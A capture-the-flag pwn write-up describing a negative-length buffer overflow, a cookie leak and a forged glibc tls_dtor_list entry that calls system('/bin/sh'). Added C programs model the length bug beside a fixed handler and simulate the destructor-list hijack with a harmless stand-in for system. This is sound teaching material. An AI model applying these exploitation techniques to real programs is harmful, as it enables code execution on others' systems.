Tags: pwn
Rating:
<span>Passing a negative value as the message length gets past the length check and gives us a buffer overflow. Because of the way the task protects return addresses, we do not go after them; instead we use glibc's tls_dtor_list to get code execution and call system("/bin/sh").
The problem is the cookie: the function pointer in a tls_dtor_list entry is stored mangled with the pointer guard, so a forged entry is only valid if we leak it first.
A libc address can be leaked by overwriting the arguments of the message function (break *0x0804890f).
Overwriting tls_dtor_list needs one more step than the program allows, so the maximum step count (3) on the stack is overwritten with 0x4.
Finally, tls_dtor_list is overwritten with the address of a fake entry [system_addr, bin_sh_addr]; I placed it at tls_dtor_list+0x10, since stack addresses cannot be used for a reliable exploit.
</span>
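Added example (not the task's or the author's code): a C model of the length bug the writeup starts from. The buffer size, the session struct and the payload are constructed for illustration. The point it shows is that a signed bounds check lets -1 through and the count becomes SIZE_MAX once it reaches read(), so everything the client sends lands past the buffer, here on the step limit that the writeup bumps from 3 to 4.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MSG_MAX 64

/* Constructed model of the service state: a 64-byte message buffer followed by
 * the per-connection step limit (the writeup's "max steps (3)"). */
typedef struct {
    char buf[MSG_MAX];
    int  max_steps;
} session_t;

/* The length reaches the handler as a signed int (e.g. from atoi). After the
 * bounds check it is handed to read(), whose count parameter is size_t. */
size_t as_read_count(int len) { return (size_t)len; }   /* -1 becomes SIZE_MAX */

/* Simulated read(2): copies min(requested, available), like a socket read. */
static size_t fake_read(char *dst, size_t requested, const char *src, size_t avail) {
    size_t n = requested < avail ? requested : avail;
    for (size_t i = 0; i < n; i++)
        dst[i] = src[i];
    return n;
}

/* Vulnerable handler: signed comparison, so any negative length passes. */
int handle_message_vuln(session_t *s, int len, const char *data, size_t avail) {
    if (len > MSG_MAX)              /* -1 > 64 is false: the check passes */
        return -1;
    /* requested count is SIZE_MAX, so the "read" takes everything that was sent */
    fake_read(s->buf, as_read_count(len), data, avail);
    return 0;
}

/* Hardened handler: reject negatives before the value is widened to size_t. */
int handle_message_safe(session_t *s, int len, const char *data, size_t avail) {
    if (len < 0 || len > MSG_MAX)
        return -1;
    fake_read(s->buf, (size_t)len, data, avail);
    return 0;
}

/* Constructed client message: length -1, then 64 filler bytes and a 4-byte value
 * that lands on max_steps. Returns max_steps afterwards: 4 if the overflow
 * worked, 3 if the handler rejected the message. */
int send_negative_length(int (*handler)(session_t *, int, const char *, size_t)) {
    session_t s;
    memset(&s, 0, sizeof s);
    s.max_steps = 3;

    char payload[MSG_MAX + sizeof(int)];
    memset(payload, 'A', MSG_MAX);
    int new_limit = 4;
    memcpy(payload + MSG_MAX, &new_limit, sizeof new_limit);

    handler(&s, -1, payload, sizeof payload);
    return s.max_steps;
}

int main(void) {
    printf("max_steps after vulnerable handler: %d\n", send_negative_length(handle_message_vuln));
    printf("max_steps after hardened handler:   %d\n", send_negative_length(handle_message_safe));
    return 0;
}
```

The fix is the `len < 0` test placed before the conversion; checking `(size_t)len > MSG_MAX` after widening would also work, but rejecting negatives explicitly keeps the intent visible.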
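Added example (not glibc's or the author's code): a model of how glibc's __call_tls_dtors walks tls_dtor_list at exit, demangling each entry's function pointer with the pointer guard before calling it, and of the forged [system, "/bin/sh"] entry the writeup points the list head at. The struct field order and the mangling scheme (xor with the guard, then rol 9 on i386 or rol 17 on x86_64) are glibc's; the guard values, the fake_system stand-in and the exploit_with_guess harness are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of glibc's thread-local destructor list (stdlib/cxa_thread_atexit_impl.c).
 * Real glibc keeps tls_dtor_list as a __thread variable and stores func mangled
 * with the per-thread pointer guard. Guard values here are made up. */
typedef void (*dtor_func)(void *);

struct dtor_list {
    uintptr_t         func;   /* mangled function pointer */
    void             *obj;    /* argument passed to func */
    void             *map;    /* struct link_map * in glibc, unused here */
    struct dtor_list *next;
};

#define PTR_BITS (sizeof(uintptr_t) * 8)
#define ROT      (PTR_BITS == 32 ? 9 : 17)    /* i386: rol 9, x86_64: rol 17 */

static struct dtor_list *tls_dtor_list;   /* the list head the overflow overwrites */
static uintptr_t pointer_guard;           /* the "cookie" that has to be leaked */

static uintptr_t rol(uintptr_t v, unsigned r) { return (v << r) | (v >> (PTR_BITS - r)); }
static uintptr_t ror(uintptr_t v, unsigned r) { return (v >> r) | (v << (PTR_BITS - r)); }

static uintptr_t ptr_mangle(uintptr_t p, uintptr_t guard)   { return rol(p ^ guard, ROT); }
static uintptr_t ptr_demangle(uintptr_t m, uintptr_t guard) { return ror(m, ROT) ^ guard; }

/* What __cxa_thread_atexit_impl does: mangle func and push onto the list. */
static void register_tls_dtor(struct dtor_list *e, dtor_func f, void *obj) {
    e->func = ptr_mangle((uintptr_t)f, pointer_guard);
    e->obj  = obj;
    e->map  = NULL;
    e->next = tls_dtor_list;
    tls_dtor_list = e;
}

/* What __call_tls_dtors does at exit: pop, demangle, call. Returns calls made. */
static int call_tls_dtors(void) {
    int n = 0;
    while (tls_dtor_list) {
        struct dtor_list *cur = tls_dtor_list;
        dtor_func f = (dtor_func)ptr_demangle(cur->func, pointer_guard);
        tls_dtor_list = cur->next;
        f(cur->obj);
        n++;
    }
    return n;
}

static int  legit_calls;
static void legit_dtor(void *unused) { (void)unused; legit_calls++; }

/* Normal program: one registered destructor runs once at exit. */
int normal_exit_path(uintptr_t guard) {
    struct dtor_list e;
    pointer_guard = guard;
    tls_dtor_list = NULL;
    legit_calls = 0;
    register_tls_dtor(&e, legit_dtor, NULL);
    return call_tls_dtors() == 1 && legit_calls == 1;
}

/* Stand-in for system(): records the command instead of spawning a shell. */
static char spawned[32];
static void fake_system(void *cmd) { snprintf(spawned, sizeof spawned, "%s", (const char *)cmd); }

/* Attacker side: build the entry the writeup places at tls_dtor_list+0x10,
 * [mangled system, pointer to "/bin/sh"], and redirect the list head to it. */
static void forge_entry(struct dtor_list *fake, uintptr_t leaked_guard,
                        dtor_func target, void *arg) {
    fake->func = ptr_mangle((uintptr_t)target, leaked_guard);
    fake->obj  = arg;
    fake->map  = NULL;
    fake->next = NULL;          /* terminate so the walker stops after us */
    tls_dtor_list = fake;       /* the overflow write */
}

/* Returns 1 if an entry forged with attacker_guess makes exit call
 * fake_system("/bin/sh") under real_guard, 0 if the guess was wrong
 * (real glibc would then jump to a garbage address, so we do not call). */
int exploit_with_guess(uintptr_t real_guard, uintptr_t attacker_guess) {
    static char binsh[] = "/bin/sh";
    struct dtor_list fake;
    pointer_guard = real_guard;
    tls_dtor_list = NULL;
    spawned[0] = '\0';

    forge_entry(&fake, attacker_guess, fake_system, binsh);
    if (ptr_demangle(fake.func, pointer_guard) != (uintptr_t)fake_system)
        return 0;
    call_tls_dtors();
    return strcmp(spawned, "/bin/sh") == 0;
}

int main(void) {
    printf("normal exit path ok:            %d\n", normal_exit_path(0x1234567u));
    printf("forged entry, leaked cookie:    %d\n", exploit_with_guess(0x5eed0001u, 0x5eed0001u));
    printf("forged entry, wrong cookie:     %d\n", exploit_with_guess(0x5eed0001u, 0x5eed0000u));
    return 0;
}
```

Because the mangling is a bijection keyed only by the guard, one leaked cookie is enough to forge any entry; a wrong cookie corrupts every bit of the target address, which is why the leak comes before the overwrite in the writeup.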